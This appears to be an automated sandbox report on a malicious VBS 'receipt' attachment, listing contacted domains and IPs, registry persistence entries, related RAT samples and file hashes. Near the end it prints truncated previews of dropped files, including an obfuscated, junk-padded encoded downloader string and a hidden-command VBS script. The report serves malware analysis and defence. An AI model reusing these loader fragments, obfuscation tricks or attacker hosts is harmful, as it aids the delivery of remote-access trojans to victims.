https://paste.ee/;	wscript.exe, 00000000.00000003.1878261147.000001A8605AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886063034.000001A8605AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee	wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6	powershell.exe, 00000003.00000002.2812838257.0000020900059000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2281228806.000001C580223000.00000004.00000800.00020000.00000000.sdmp	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspxd	wscript.exe, 00000000.00000003.1666302244.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856696221.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1855839456.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665865168.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1877954656.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879515265.000001A860250000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paste.ee/d/Pz7Njec1	wscript.exe, 00000000.00000002.1885271657.000001A85E531000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879196524.000001A85E531000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879538877.000001A85E531000.00000004.00000020.00020000.00000000.sdmp	false		high
https://uploaddeimagens.com.br	powershell.exe, 00000007.00000002.2281228806.000001C580223000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000007.00000002.2642487198.000001C590071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.2642487198.000001C590071000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/	wscript.exe, 00000000.00000003.1878261147.000001A8605AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886063034.000001A8605AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://app01.system.com.br/RDWeb/Pages/login.aspxW	wscript.exe, 00000000.00000003.1878753795.000001A85E58C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1885383536.000001A85E58C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com	wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.2812838257.000002090006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2281228806.000001C580001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://pastzangam.zangamzangam/d/Pz7NjC	wscript.exe, 00000000.00000003.1666302244.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856696221.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1855839456.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665865168.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1877954656.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879515265.000001A860250000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.2812838257.000002090009E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2281228806.000001C580001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspx	wscript.exe, 00000000.00000002.1885694563.000001A860220000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1666302244.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879538877.000001A85E509000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856696221.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879175290.000001A860222000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856630795.000001A86023C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879196524.000001A85E4ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1855839456.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665749382.000001A860230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665816178.000001A85E509000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665865168.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878753795.000001A85E58C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884599780.000001A860225000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1885383536.000001A85E58C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1885713037.000001A860225000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1877954656.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879515265.000001A860250000.00000004.00000020.00020000.00000000.sdmp, S847453-receipt.vbs	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.187.200	paste.ee	United States	13335	CLOUDFLARENETUS	false
104.21.45.138	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true
12.221.146.138	xwormay8450.duckdns.org	United States	7018	ATT-INTERNET4US	true
131.153.147.50	evolve27.com	United States	19437	SS-ASHUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1436274
Start date and time:	2024-05-04 09:47:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	S847453-receipt.vbs
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winVBS@14/14@5/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 16 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3916 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:48:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\escudellar.vbs
08:49:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\escudellar.vbs
08:49:15	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk
09:48:11	API Interceptor	1x Sleep call for process: wscript.exe modified
09:48:37	API Interceptor	62x Sleep call for process: powershell.exe modified
09:48:56	API Interceptor	50x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.187.200	EWW.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/gFlKP
	ODC#PO 4500628950098574654323567875765674433##633.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/JxxYu
	Purchase Order PO0193832.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/Bpplq
	Name.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/0kkOm
	517209487.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/s0kJG
	screen_shots.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/GoCAw
	66432890.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/D6Uw6
	96874650.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/yj4hE
	1e#U041e.vbs	Get hash	malicious	AgentTesla	Browse	paste.ee/d/QkK2f
	751652433.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/0BSaJ
104.21.45.138	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse
	QF3YL9rOxB.rtf	Get hash	malicious	AgentTesla	Browse
	cotizaci#U00f3n_04302024.xla.xlsx	Get hash	malicious	AgentTesla	Browse
	Demand Q2-2024.xlsx	Get hash	malicious	Unknown	Browse
	dgYOTTzRDQ.rtf	Get hash	malicious	AgentTesla	Browse
	Factura.PDF______________________________________.vbs	Get hash	malicious	StormKitty, XWorm	Browse
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.img	Get hash	malicious	XWorm	Browse
	Shipment Receipts20240425.vbs	Get hash	malicious	Unknown	Browse
	upload.vbs	Get hash	malicious	VenomRAT	Browse
12.221.146.138	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse
	171445824977c976fac5440dadfae67b1829817677698fe84127a065ee0d81bdba97dc885f639.dat-decoded.exe	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.img	Get hash	malicious	XWorm	Browse
	F723838674.vbs	Get hash	malicious	Remcos	Browse
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
paste.ee	youhaveonefilefortody.vbs	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	s9ZjvgSMt1.rtf	Get hash	malicious	Unknown	Browse	172.67.187.200
	getinher.doc	Get hash	malicious	AgentTesla	Browse	172.67.187.200
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	172.67.187.200
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	ls3wzs2VQr.rtf	Get hash	malicious	Unknown	Browse	172.67.187.200
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	104.21.84.67
	325445263.img	Get hash	malicious	Unknown	Browse	172.67.187.200
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	104.21.84.67
uploaddeimagens.com.br	youhaveonefilefortody.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	getinher.doc	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	172.67.215.45
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	QF3YL9rOxB.rtf	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	citat-05012024.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	172.67.215.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.139.174
	1CMweaqlKp.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.19.24
	SecuriteInfo.com.PossibleThreat.PALLASNET.H.14592.12237.dll	Get hash	malicious	Unknown	Browse	172.67.129.98
	https://securepdffilesaccess%E3%80%82com/docx/#9403ZGF2ZW1AY3BlcXVpdHkuY29t??nEJx==78463=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d#&vg=008d8185-7421-4d39-a8ea-d6571496b99e&stid=14&pti=1&pa=20041&pos=0&p=525094&channelId=21280b5d95ea9121&s=lsfbx0rnvkkgxzgo1sbi4b3z&sgs=2004:15-17+F-150	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://baoku.360.cn/d/2000006826_9510044	Get hash	malicious	Unknown	Browse	1.1.1.1
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	172.67.200.96
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	104.21.13.139
	https://www.bjvpza.cn/	Get hash	malicious	Unknown	Browse	104.22.39.239
	https://broken-rain-1a74.1rwvvy66.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://rdtetsyutfuyfrxytf.azurewebsites.net/	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
ATT-INTERNET4US	sora.arm-20240504-0115.elf	Get hash	malicious	Mirai	Browse	108.218.226.97
	sora.x86-20240504-0115.elf	Get hash	malicious	Mirai	Browse	107.67.131.199
	https://monacolife.net	Get hash	malicious	Unknown	Browse	13.36.27.25
	x86.elf	Get hash	malicious	Unknown	Browse	32.45.187.39
	2AAH1UYstb.elf	Get hash	malicious	Mirai	Browse	99.160.220.147
	9d565bee-e6ce-1842-e729-b0df8f08ed34.eml	Get hash	malicious	HTMLPhisher	Browse	172.183.192.109
	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse	13.36.222.91
	aduLTc2Dny.elf	Get hash	malicious	Mirai	Browse	108.250.97.104
	H0RZizYUEv.elf	Get hash	malicious	Mirai	Browse	99.158.139.227
	saq4WWKA5B.elf	Get hash	malicious	Mirai	Browse	69.224.33.94
CLOUDFLARENETUS	1CMweaqlKp.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.19.24
	SecuriteInfo.com.PossibleThreat.PALLASNET.H.14592.12237.dll	Get hash	malicious	Unknown	Browse	172.67.129.98
	https://securepdffilesaccess%E3%80%82com/docx/#9403ZGF2ZW1AY3BlcXVpdHkuY29t??nEJx==78463=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d#&vg=008d8185-7421-4d39-a8ea-d6571496b99e&stid=14&pti=1&pa=20041&pos=0&p=525094&channelId=21280b5d95ea9121&s=lsfbx0rnvkkgxzgo1sbi4b3z&sgs=2004:15-17+F-150	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://baoku.360.cn/d/2000006826_9510044	Get hash	malicious	Unknown	Browse	1.1.1.1
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	172.67.200.96
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	104.21.13.139
	https://www.bjvpza.cn/	Get hash	malicious	Unknown	Browse	104.22.39.239
	https://broken-rain-1a74.1rwvvy66.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://rdtetsyutfuyfrxytf.azurewebsites.net/	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
	https://www.uhnrya.cn/	Get hash	malicious	Unknown	Browse	104.22.39.239
SS-ASHUS	https://mandrillapp.com/track/click/30551860/topbusiness.ro?p=eyJzIjoiWmkwVnFVYXdRYlFmYnVnd3Y3OWdtR2h1anpvIiwidiI6MSwicCI6IntcInVcIjozMDU1MTg2MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3RvcGJ1c2luZXNzLnJvXFxcL3dwLWFkbWluXFxcL2pzXFxcL3dpZGdldHNcXFwvbWVkaWFcXFwvP2FjdGlvbj12aWV3JjE0MD1jMk52ZEhRdVpHRm9ibXRsUUd4allYUjBaWEowYjI0dVkyOXQmcjE9MTQwJnIyPTE0MCZub2lzZT00Q0hBUlwiLFwiaWRcIjpcImVjMTY1MjE1OWRhYTRjZTA5ZGZhODE5NTEzNzU2Mjg1XCIsXCJ1cmxfaWRzXCI6W1wiOGMyZTc5NjYyNTU5N2FjNDFlODZkYmM4MWMwMjI2MTFjZjYyYTIzMlwiXX0ifQ	Get hash	malicious	HTMLPhisher	Browse	131.153.170.221
	Remittance. #U0440df.html	Get hash	malicious	HTMLPhisher	Browse	131.153.151.114
	http://loveevamk.life	Get hash	malicious	Unknown	Browse	131.153.131.121
	https://bs-2pp.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	198.24.163.92
	https://infobanknews.com/bank-btpn-tuntaskan-akuisisi-oto-group-senilai-rp655-triliun/	Get hash	malicious	Unknown	Browse	198.24.167.172
	http://midjourney.co	Get hash	malicious	Unknown	Browse	131.153.171.234
	http://zarabidarix.xyz/4kKUDf2271ibnX494fplpivknze26JVIISAKNWCQFBYE13955JAYA338314o10	Get hash	malicious	Unknown	Browse	131.153.151.100
	https://xsetlp3sattty7yhmls.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	131.153.168.132
	https://bafkreiakypngf5p2vusgmzt3htrul7f7hmhpylofrop6cg6waka2djtzz4.ipfs.dweb.link/#katja.lundberg-rand@daiichi-sankyo.eu	Get hash	malicious	Unknown	Browse	131.153.148.27
	https://www.msn.com/en-us/weather/forecast/in-Des-Moines,IA?loc=eyJsIjoiRGVzIE1vaW5lcyIsInIiOiJJQSIsImMiOiJVbml0ZWQgU3RhdGVzIiwiaSI6IlVTIiwidCI6MSwiZyI6ImVuLXVzIiwieCI6Ii05My42MjAzMzg0Mzk5NDE0IiwieSI6IjQxLjU4ODc5MDg5MzU1NDY5In0%3D&weadegreetype=F	Get hash	malicious	Unknown	Browse	131.153.148.26

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	LFfjUMuUFU.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm	Browse	131.153.147.50 104.21.45.138
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	131.153.147.50 104.21.45.138
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	131.153.147.50 104.21.45.138
	nXaujG6G1F.exe	Get hash	malicious	Blank Grabber, DCRat, Umbral Stealer	Browse	131.153.147.50 104.21.45.138
	FACTURAS-ALBARANES.exe	Get hash	malicious	AgentTesla	Browse	131.153.147.50 104.21.45.138
	http://pixelread.com	Get hash	malicious	Unknown	Browse	131.153.147.50 104.21.45.138
	https://url.us.m.mimecastprotect.com/s/rYQHCYEBgkHWJjw3h0H9oU?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	131.153.147.50 104.21.45.138
	ent.exe	Get hash	malicious	XWorm	Browse	131.153.147.50 104.21.45.138
	Order PS24S0040.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	131.153.147.50 104.21.45.138
	reports_239900.html	Get hash	malicious	Unknown	Browse	131.153.147.50 104.21.45.138
37f463bf4616ecd445d4a1937da06e19	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.187.200
	SecuriteInfo.com.Trojan.Siggen22.5496.19647.10510.exe	Get hash	malicious	Unknown	Browse	172.67.187.200
	yvg1X8doal.dll	Get hash	malicious	Latrodectus	Browse	172.67.187.200
	6kAOUicqCK.dll	Get hash	malicious	Latrodectus	Browse	172.67.187.200
	GLKJoBXIVE.dll	Get hash	malicious	Latrodectus	Browse	172.67.187.200
	2024 9_45_44 p.m..js	Get hash	malicious	WSHRAT	Browse	172.67.187.200
	2024 9_45_44 p.m..js	Get hash	malicious	WSHRAT	Browse	172.67.187.200
	2024 8_35_29 p.m..js	Get hash	malicious	WSHRAT	Browse	172.67.187.200
	2024 8_35_29 p.m..js	Get hash	malicious	Unknown	Browse	172.67.187.200
	2024_04_005.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.187.200

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\RegAsm.exe	7sYKxZWLgw.exe	Get hash	malicious	PureLog Stealer	Browse
	55wj9QSq9c.exe	Get hash	malicious	RedLine	Browse
	Celery.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse
	qBSw7aeXEM.exe	Get hash	malicious	RedLine	Browse
	AWB NO. 077-57676135.exe	Get hash	malicious	AgentTesla	Browse
	z4aHc5RDMN.exe	Get hash	malicious	RedLine	Browse
	hesaphareketi-01.pdf.SCR.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi_1.SCR.exe	Get hash	malicious	AgentTesla	Browse
	remasdasd.exe	Get hash	malicious	XWorm	Browse
	9safSk1jJz.exe	Get hash	malicious	RedLine	Browse

Created / dropped Files

C:\ProgramData\escudellar.vbs

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	437480
Entropy (8bit):	5.105403560005336
Encrypted:	false
SSDEEP:	6144:sVNFUxUwlTY4h4QmIICQ791+yhii4591lF1UflGsZcfb:nINyeOirlc
MD5:	42320E659E8E1885EB96342E52E4EC60
SHA1:	8FF7099935C8375DDC21E19D61FE13AE56BEA2F0
SHA-256:	5FE439B587F246640A61C65F77380EA1EC486EC799C676B10102C2A502EADFA9
SHA-512:	CC35BB7E273C59C39C25FB902E12379A368FAE97C8403C7DF669DB215E57BDB805D649FAA7DB084E13ADE1F4AA3D97F3457E667770EF2F5D489AD9AED214A707
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	Dim FSO, shell, xslProcessor....Sub RunCmd(CommandString, OutputFile).. cmd = "cmd /c " + CommandString + " >> " + OutputFile.. shell.Run cmd, 0, True..End Sub....Sub GetOSInfo(outputFileName).. On Error Resume Next.. strComputer = ".".. HKEY_LOCAL_MACHINE = &H80000002.... Dim objReg, outputFile.. Dim buildDetailNames, buildDetailRegValNames.... buildDetailNames = Array("Product Name", "Version", "Build Lab", "Type").. buildDetailRegValNames = Array("ProductName", "CurrentVersion", "BuildLabEx", "CurrentType").... Set outputFile = FSO.OpenTextFile(outputFileName, 2, True).... Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_.. strComputer & "\root\default:StdRegProv").... outputFile.WriteLine("[Architecture/Processor Information]").. outputFile.WriteLine().. outputFile.Close.. cmd = "cmd /c set processor >> " & outputFileName.. shell.Run cmd, 0, True.... Set outputFile = FSO.OpenTextFile(outpu

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Pz7Nj[1].txt

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11197), with CRLF line terminators
Category:	dropped
Size (bytes):	13265
Entropy (8bit):	4.82823952898708
Encrypted:	false
SSDEEP:	384:p1NvANVgDm0mkukQwqHd+mUdG+6N3/YJnH+n6RFKVpPgRIVNibcMbA43y:sVib/ukmHgfdGZN3/YJe6eVlcAOAL
MD5:	D900AE5001D68A66278A70DFAA237C95
SHA1:	3EFC3C67F37CFEBA0305D55174992D06FE49FF11
SHA-256:	7AAEB3F5A62ECAC8D21067976E97253790B736A7F96054B0AE4C2430F558850C
SHA-512:	6F57FC1828D18A7A843A89B17F88C31A37A1F73A6ABF640C219A1D21478B088A00F291FBF676D976606FAE85CE2FADBAFF0CE0D749D56E0972B0D6F7E50CA761
Malicious:	false
Preview:	.. dim sousanas , cupaurana , experiente , thymallo , embravear , Cama , embravear1.. cupaurana = " ".. experiente = "" & thymallo & cupaurana & thymallo & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & thymallo & cupaurana & thymallo & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & thymallo & cupaurana & thymallo & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & thymallo & cupaurana & thymallo & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & thymallo & cupaurana & thymallo & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & thymallo & cupaurana & thymallo & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & 